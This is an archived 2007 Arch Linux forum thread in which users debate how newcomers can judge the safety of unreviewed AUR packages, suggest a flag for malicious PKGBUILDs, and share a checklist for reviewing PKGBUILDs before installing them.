Newbie, AUR, and Safety

ravisghosh · 2007-08-19 22:00:35

One big hinderance for people coming to arch is availability of packages. Not everyone knows and/or wants to build packages self. Moreover, installing packages with pacman or aurbuild has many advantages over building it. Many packages are available in AUR and a lot of them are not marked safe which puts newbies like me (who cannot make sense of pkgbuilds) in dilemma whether to install them or not. TU's are quite busy marking packages as safe. But its not possible to do this for all the packages. An alternative way might be to have an option like "vote" and "out dated" to mark packages "unsafe" so that users (NOT TU's) who look at the pkgbuild and finds something unusual can mark those packages unsafe and TU's can look into those packages on a priority basis and remove the packages and ban the maintainer. In this way, we will be removing unsafe packages and banning the sinners and hence making the whole AUR safer and safer.

nikron · 2007-08-19 22:59:58

Err, what is your point? Stating what is already done? I don't know if you can flag something as unsafe, but other than that, it seems like everything you mentioned is implemented?

Also, PKGBUILD 's are extremely easy things to understand. Perhaps the wiki needs to be clearer?

ravisghosh · 2007-08-19 23:48:54

Thats the point, the ability to flag things "unsafe." Whatever else I mentioned is already there. I was just trying to make thing clear that just as we have "vote" thing, we can have something like "unsafe"

Also, you are right on the wiki issue.

Misfit138 · 2007-08-20 00:03:04

ravisghosh wrote:

One big hinderance for people coming to arch is availability of packages. Not everyone knows and/or wants to build packages self. Moreover, installing packages with pacman or aurbuild has many advantages over building it.

Arch has many thousands of packages between ABS, current, extra and community, let alone AUR. Have you activated 'extra' and 'community' in your pacman.conf?
ABS is very easy to use, simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then, just do makepkg and install with pacman with pacman -U name_of_pkg.tar.gz
Some packages in AUR are already in community, and are installable through pacman. Make sure you pacman -Ss name_of_pkg to see if it is available in the repos before looking elsewhere,

droog · 2007-08-20 02:41:49

ravisghosh wrote:

Thats the point, the ability to flag things "unsafe." Whatever else I mentioned is already there. I was just trying to make thing clear that just as we have "vote" thing, we can have something like "unsafe"
Also, you are right on the wiki issue.

You mean so any user can flag a package as unsafe if they find a malicious pkgbuild? I think thats a pretty good idea too,
have it say "10 users have flagged this package as malicious" or "10 users have flagged this package as safe" something similar. aurbuild could use this info and let you know?
That would be helpful to all the packages the TU's haven't checked, but i think its assumed you will look over the pkgbuild before you use it,

ravisghosh · 2007-08-20 06:29:00

Misfit138 wrote:

ABS is very easy to use, simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then, just do makepkg and install with pacman with pacman -U name_of_pkg.tar.gz

If there is a malacious code in pkgbuild, then would doing the above mean that I'm safe! Sorry if that is a stupid question, but to the best of my knowledge, if there is something evil in pkgbuild, then doing the above would also mean that I'm putting my system in danger. Isnt it so?

ravisghosh · 2007-08-20 06:40:06

droog wrote:

You mean so any user can flag a package as unsafe if they find a malicious pkgbuild? I think thats a pretty good idea too,
have it say "10 users have flagged this package as malicious" or "10 users have flagged this package as safe" something similar. aurbuild could use this info and let you know?
That would be helpful to all the packages the TU's haven't checked, but i think its assumed you will look over the pkgbuild before you use it,

Thats like something what I meant.

but i think its assumed you will look over the pkgbuild before you use it,

Not every has sound technical knowledge (at least not me) and can glean meaning of pkgbuild and for that reason only you have "safe" flag out there.

wizzomafizzo · 2007-08-20 07:58:33

If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.

A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.

shining · 2007-08-20 10:00:12

wizzomafizzo wrote:

If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.

Also what I was thinking

ravisghosh · 2007-08-20 13:11:48

wizzomafizzo wrote:

If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.

I agree with u to. In fact, that is what I initially thought. See my initial post where I mention that a TU can look into the pkgbuild on a priority basis when reported.

Jessehk · 2007-08-20 14:49:48

wizzomafizzo wrote:

If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.

Maybe the wording on the AUR should be changed then. I know I associate "safety" with it's opposite: danger. If a package is not marked as safe, I usually wonder if there is something about it that may somehow compromise my computer (even though I understand PKGBUILD's).

Perhaps the wording could be changed to "This package conforms to Arch Linux packaging standards". I think that would be clearer for many people.

Last edited by Jessehk (2007-08-20 14:51:47)

Cerebral · 2007-08-20 15:07:51

ravisghosh wrote:

Misfit138 wrote:
ABS is very easy to use, simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then, just do makepkg and install with pacman with pacman -U name_of_pkg.tar.gz
If there is a malacious code in pkgbuild, then would doing the above mean that I'm safe! Sorry if that is a stupid question, but to the best of my knowledge, if there is something evil in pkgbuild, then doing the above would also mean that I'm putting my system in danger. Isnt it so?

Note that the ABS command pulls PKGBUILD files from the Arch CVS (ie. current/extra/unstable and maybe community, I'm not sure) Those PKGBUILDs are maintained by devs and TUs - if you don't trust them, who can you trust?

veek · 2007-08-20 15:57:51

ravisghosh wrote:

One big hinderance for people coming to arch is availability of packages.

I hear this occasionally, and I wonder what packages people are talking about? Just curious.
Between AUR and the repos I rarely have to build my own packages. When I do it's usually
so I can regularly build bleeding edge apps out of some version control system.

Also, using yaourt, building out of AUR is as easy as getting binaries from the repos.

Last edited by veek (2007-08-20 15:59:41)

ravisghosh · 2007-08-21 00:52:39

Most of the apps which are not marked safe are in unsupported which is not a part of abs.

ravisghosh · 2007-08-21 01:00:52

veek wrote:

I hear this occasionally, and I wonder what packages people are talking about? Just curious.
Between AUR and the repos I rarely have to build my own packages. When I do it's usually
so I can regularly build bleeding edge apps out of some version control system.
Also, using yaourt, building out of AUR is as easy as getting binaries from the repos.

Thats the issue. One needs aur too along with repos where many packages in unsupported are not marked safe. We are talking about those packages. For example, 2 good firewall apps, firehol and arno's are in aur and are not marked safe. yaourt too is not marked safe. If one does not understand pkgbuild, then how is s/he going to make sure that there is nothing wrong being installed.

mucknert · 2007-08-21 06:33:34

By learning, silly! Arch is no hand-holding distribution and same goes for the AUR. You have to act responsibly when you use packages from the AUR. There is no sense in dumbing things down for people that are to, let's say lazy, to get a grip about PKGBUILDs. If you want something in community you can still ask a TU to give a PKGBUILD a look. Either way, to keep the AUR simple (Arch-Philosopy, you know) the users have to learn.

That being said: go wizzomafizzo!

STiAT · 2007-08-21 14:19:06

Well, hands down. We're working on marking packages safe (i'm not currently, for personal reasons i just keep packages up to date).

Some time ago, i took up the work marking every package safe which appears in the recent update list, by reviewing them, marking them and flagging them. I found myself spending 60h+ a week on this task, and didn't get along with any of my development tasks.

Even though, note that packages are unsafe again, if they're updated, since we can't know what code the update brought (often i flagged a package 4 times within 5 minutes, since the author forgot the contributor tag, added a comment, forgot to raise the pkgver etc).

Also, when i was overlooking the packages, i had about 10-20 % of the packages which i could flag safe. That's a ridiculous small number, most of them were missing dependencies, did compile fine, but had a wrong install method, installing directly in / instead of $startdir/pkg and similar.

The quality of AUR packages in general isn't very high, sad but true. I don't think users intend to damage anything or are intentionally making packages which won't work out. It's a reason of missing knowledge, but the will of helping others. I know a lot of TUs are working very hard on flagging packages, and currently, they're doing a good job in their spare time.

I think the best way of using AUR is, to learn how compiling linux software works, and what could cause troubles.

To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches, which are not in the bugtracker and marked for the next version and / or confirmed problems (add the bug# to the pkgbuild for the patch will help us).
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.

Yours,
STiAT

nikron · 2007-08-21 14:45:37

That's the major problem with AUR, is that there are plenty of really bad PKGBUILD . It is pretty much required that you know how a PKGBUILD works, and the proper guidelines to them if you use AUR.

Snowman · 2007-08-21 20:51:18

STiAT wrote:

To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches, which are not in the bugtracker and marked for the next version and / or confirmed problems (add the bug# to the pkgbuild for the patch will help us).
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.
Yours,
STiAT

Also check the .install file as it's a script which is ran as root.

ravisghosh · 2007-08-22 05:26:45

STiAT wrote:

Some time ago, i took up the work marking every package safe which appears in the recent update list, by reviewing them, marking them and flagging them. I found myself spending 60h+ a week on this task, and didn't get along with any of my development tasks.
Even though, note that packages are unsafe again, if they're updated, since we can't know what code the update brought (often i flagged a package 4 times within 5 minutes, since the author forgot the contributor tag, added a comment, forgot to raise the pkgver etc).

I guess thats where a flagging system will help.

Also, when i was overlooking the packages, i had about 10-20 % of the packages which i could flag safe. That's a ridiculous small number, most of them were missing dependencies, did compile fine, but had a wrong install method, installing directly in / instead of $startdir/pkg and similar.
The quality of AUR packages in general isn't very high, sad but true. I don't think users intend to damage anything or are intentionally making packages which won't work out. It's a reason of missing knowledge, but the will of helping others. I know a lot of TUs are working very hard on flagging packages, and currently, they're doing a good job in their spare time.

Few guidelines about the arch standards and simple do's and dont's in wiki might help enhance the quality of packages in AUR.

I think the best way of using AUR is, to learn how compiling linux software works, and what could cause troubles.
To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches, which are not in the bugtracker and marked for the next version and / or confirmed problems (add the bug# to the pkgbuild for the patch will help us).
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.

though most of the above went over my head I am trying to make sense of that bit by bit.

I usually run "aurbuild -saem package" to install some package. U mean to say that I should not install but just create the package with "aurbuild -saemx" and then run namcap and then install using "pacman -A"

Arch Linux

#1 2007-08-19 22:00:35

Newbie, AUR, and Safety

#2 2007-08-19 22:59:58

Re: Newbie, AUR, and Safety

#3 2007-08-19 23:48:54

Re: Newbie, AUR, and Safety

#4 2007-08-20 00:03:04

Re: Newbie, AUR, and Safety

#5 2007-08-20 02:41:49

Re: Newbie, AUR, and Safety

#6 2007-08-20 06:29:00

Re: Newbie, AUR, and Safety

#7 2007-08-20 06:40:06

Re: Newbie, AUR, and Safety

#8 2007-08-20 07:58:33

Re: Newbie, AUR, and Safety

#9 2007-08-20 10:00:12

Re: Newbie, AUR, and Safety

#10 2007-08-20 13:11:48

Re: Newbie, AUR, and Safety

#11 2007-08-20 14:49:48

Re: Newbie, AUR, and Safety

#12 2007-08-20 15:07:51

Re: Newbie, AUR, and Safety

#13 2007-08-20 15:57:51

Re: Newbie, AUR, and Safety

#14 2007-08-21 00:52:39

Re: Newbie, AUR, and Safety

#15 2007-08-21 01:00:52

Re: Newbie, AUR, and Safety

#16 2007-08-21 06:33:34

Re: Newbie, AUR, and Safety

#17 2007-08-21 14:19:06

Re: Newbie, AUR, and Safety

#18 2007-08-21 14:45:37

Re: Newbie, AUR, and Safety

#19 2007-08-21 20:51:18

Re: Newbie, AUR, and Safety

#20 2007-08-22 05:26:45

Re: Newbie, AUR, and Safety

Board footer